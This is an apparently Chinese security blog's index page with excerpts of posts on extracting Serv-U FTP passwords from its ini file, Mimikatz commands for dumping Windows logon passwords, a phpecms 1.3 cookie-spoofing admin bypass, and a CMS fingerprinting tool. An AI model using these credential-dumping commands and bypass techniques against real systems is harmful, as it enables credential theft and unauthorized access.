热门 利用Serv-U获取ftp账号密码

时间:2016-11-13   作者:webbaozi   分类: 小技巧   热度:2057°    
时间:2016-11-13   分类: 小技巧    热度:2057  
1.可以读取文件 2.安装了Serv-U 在其Serv-U安装目录会有文件ServUDaemon.ini 拿其中一个举例: 格式为: [USER=baozi|1] 表示用户为baozi password=mk7DC2A4B1A9A9E1F52A7F967FBCAA0A37表示ftp用户baozi的密码为“mk7DC2A4B1A9A9E1F52A7F967FBCAA0A37”。   HomeDir=d:\wwwroot\zt828表示默认主目录为“d:\wwwroot\baozi...

阅读全文>>

热门 Mimikatz 使用Tips

时间:2016-11-11   作者:webbaozi   分类: 小技巧   热度:1831°    
时间:2016-11-11   分类: 小技巧    热度:1831  
 ps:以管理员身份运行 1.记录 Mimikatz输出:  C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件:  C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 3.将输出传输到远程机器:  Attacker执行:&nbs...

阅读全文>>

热门 phpecms1.3 cookies欺骗漏洞进后台

时间:2016-11-11   作者:webbaozi   分类: 代码审计   热度:1325°    
时间:2016-11-11   分类: 代码审计    热度:1325  
phpecms1.3/admin/cms_check.php <?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?> 判断如果没有admin_name的cookie就跳登录页面,如果admin_name就不跳了。 phpecms1.3/admin/cms_welcome.php <?php include('../system/inc.php');...

阅读全文>>

热门 CMS指纹识别

时间:2016-11-11   作者:webbaozi   分类: 安全工具   热度:3930°    
时间:2016-11-11   分类: 安全工具    热度:3930  
首先看下界面吧 提交任务: Lib和static目录均是框架自带的.css和.js文件 Include目录下config.inc.php数据库配置文件 Sql文件打包,自行修改 登录账号baozi/baozi123   目前只是做了关键字查询的 MD5识别等识别方式都是可以自行添加的 Python Bin目录是cms识别方式 Version目录是版本识别方式 Exp目录是漏洞利用(还未做收集) ...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1